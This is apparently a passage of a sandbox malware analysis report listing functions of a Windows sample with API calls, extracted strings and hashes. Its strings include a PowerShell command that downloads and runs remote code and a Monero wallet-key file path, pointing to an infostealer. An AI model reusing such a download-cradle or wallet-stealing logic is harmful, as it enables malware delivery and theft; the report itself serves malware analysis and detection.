                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: e38049fcdc02bfad43f1839ef99001aa3c62e162deb85699a85b8f7e6c6fa71f
                  • Instruction ID: 7ef04fbc61c7e57d2729aaebfeb9862cd140334cc80191e49d35008c8bf41a4e
                  • Opcode Fuzzy Hash: e38049fcdc02bfad43f1839ef99001aa3c62e162deb85699a85b8f7e6c6fa71f
                  • Instruction Fuzzy Hash: 56314FB29003186BCB54FBA0DC85EED7379BB58700F404599B359A7081EEB4E6898F99
                  Function 00632C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00632D85
                  Strings
                  • <, xrefs: 00632D39
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00632CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00632D04
                  • ')", xrefs: 00632CB3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 28b499797caf4a7c0ddf9658c9f66a3c2d95d2b4d9429114e22f6a1e95ba2fb8
                  • Instruction ID: f3347297e0c0bbcb095688d8074b39666ab1273e80edc764370023614024699a
                  • Opcode Fuzzy Hash: 28b499797caf4a7c0ddf9658c9f66a3c2d95d2b4d9429114e22f6a1e95ba2fb8
                  • Instruction Fuzzy Hash: 5541AC71810208AADB54EBE0C892BEDB776AF14300F40411DF556B7192DF746A4ADFD6
                  Function 00629E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00629F41
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 903981e0d216766f34f7366094581f4f63f9394438bb32d68811539dd00616a3
                  • Instruction ID: 7bc801b0ab40b6a81f4de0b74c907b6cee43bfe15461e891731b58dbb7ae4f54
                  • Opcode Fuzzy Hash: 903981e0d216766f34f7366094581f4f63f9394438bb32d68811539dd00616a3
                  • Instruction Fuzzy Hash: 24616070A00218EBDB24EFA4DD96FED7776AF44304F008118F94A5F181EBB06A46CF96
                  Function 006340B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,0131ED30,00000000,00020119,?), ref: 006340F4
                  • RegQueryValueExA.ADVAPI32(?,0131F1D8,00000000,00000000,00000000,000000FF), ref: 00634118
                  • RegCloseKey.ADVAPI32(?), ref: 00634122
                  • lstrcat.KERNEL32(?,00000000), ref: 00634147
                  • lstrcat.KERNEL32(?,0131F388), ref: 0063415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 68faad84f283910e030c9af3d8cf71a723f847164c2aec421140aa23c869007f
                  • Instruction ID: 9aa23cbe8eb038e20113d80a0df4eaf558d12053e4b42503a1931b4bff43103e
                  • Opcode Fuzzy Hash: 68faad84f283910e030c9af3d8cf71a723f847164c2aec421140aa23c869007f
                  • Instruction Fuzzy Hash: BF4178B69001186BDB18EBA0EC56FED733EBB58300F00455DB61567181EAB55B888FD2
                  Function 00637E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00637E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,0130C2F8,00000000,00020119,?), ref: 00637E5E
                  • RegQueryValueExA.ADVAPI32(?,0131ECD0,00000000,00000000,000000FF,000000FF), ref: 00637E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00637E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: f7d8f93ec38749bfa1c9a4bae8aa19010486223703350ce1219275cac6421f49
                  • Instruction ID: 7cb761aa1b6732092346b3675fdc4b892f616749e996ac244ccd4056531f104f
                  • Opcode Fuzzy Hash: f7d8f93ec38749bfa1c9a4bae8aa19010486223703350ce1219275cac6421f49
                  • Instruction Fuzzy Hash: 85115EB1A44205EBDB14CF94DD4AFBBBBB9FB44B10F104159F606A7280D7B468018FE2
                  Function 00639260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(0131F118,?,?,?,0063140C,?,0131F118,00000000), ref: 0063926C
                  • lstrcpyn.KERNEL32(0086AB88,0131F118,0131F118,?,0063140C,?,0131F118), ref: 00639290
                  • lstrlen.KERNEL32(?,?,0063140C,?,0131F118), ref: 006392A7
                  • wsprintfA.USER32 ref: 006392C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: c0fd70f8f8a4cea33180b5ad90ee982fd20fb8b2666a2fa376550d374546697a
                  • Instruction ID: 7c9c784b78801777347dc77dcd053471b57839536c11b87508865d918da538a5
                  • Opcode Fuzzy Hash: c0fd70f8f8a4cea33180b5ad90ee982fd20fb8b2666a2fa376550d374546697a
                  • Instruction Fuzzy Hash: 5601A975500208FFCB08DFE8C984EAE7BB9FB44364F158148F909AB304C671AA40DF91
                  Function 006212A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006212B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 006212BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006212D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006212F5
                  • RegCloseKey.ADVAPI32(?), ref: 006212FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 7a35b5dd4658a7efc5a60f907ca8bea9e897ded65e28d79e3c64e860fde6a619
                  • Instruction ID: 4793aa933f74eeb1f2da8771e23d12ae6a25da779cda4a48c9c35e4cd85a0378
                  • Opcode Fuzzy Hash: 7a35b5dd4658a7efc5a60f907ca8bea9e897ded65e28d79e3c64e860fde6a619
                  • Instruction Fuzzy Hash: B70136B5A40208BBDB04DFD0DC49FAEB7B8FB48701F008155FA05A7280D6B1AA018F51
                  Function 0063C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: eb5ba1ab7fef1b4a727fd5d1b1728c25655edda6d1e9612c52de750500334a13
                  • Instruction ID: 45bfd1e260ac3ad4a60147d7d48dcd25bee685822e76ea234f203fccb8bb2c6d
                  • Opcode Fuzzy Hash: eb5ba1ab7fef1b4a727fd5d1b1728c25655edda6d1e9612c52de750500334a13
                  • Instruction Fuzzy Hash: EC4126B150079C5EDB218B24CC84FFBBBEA9F45314F1444ECE9CA96182D2719B45DFA4
                  Function 00636630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00636663
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00636726
                  • ExitProcess.KERNEL32 ref: 00636755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: feb5f370014f35dc1d0234a4f36f1e02210f7932a086ac704ba736d84797ae48
                  • Instruction ID: 5db7e29f2edfb08bb5f84e4b1327b60812a61f8c43a5e7da437ecb746ce423b3
                  • Opcode Fuzzy Hash: feb5f370014f35dc1d0234a4f36f1e02210f7932a086ac704ba736d84797ae48
                  • Instruction Fuzzy Hash: 61312DB1801218AADB54EB90DC96BDD7779BF04300F405199F20677191DF746B48CF9A
                  Function 006387C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00640E28,00000000,?), ref: 0063882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00638836
                  • wsprintfA.USER32 ref: 00638850
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 78963dd27d61fcf9d71b7ad3a48947d31259763ff8bf981b8277428a7cff5241
                  • Instruction ID: 3339e30306bcef865132f669db2d963b7a90c617f686071ac87b6dc32e65662b
                  • Opcode Fuzzy Hash: 78963dd27d61fcf9d71b7ad3a48947d31259763ff8bf981b8277428a7cff5241
                  • Instruction Fuzzy Hash: 2E2100B1A44204AFDB04DFD4DD45FAEBBB9FB48711F114119F605B7280CBB9A9018FA5
                  Function 00638D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0063951E,00000000), ref: 00638D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00638D62
                  • wsprintfW.USER32 ref: 00638D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
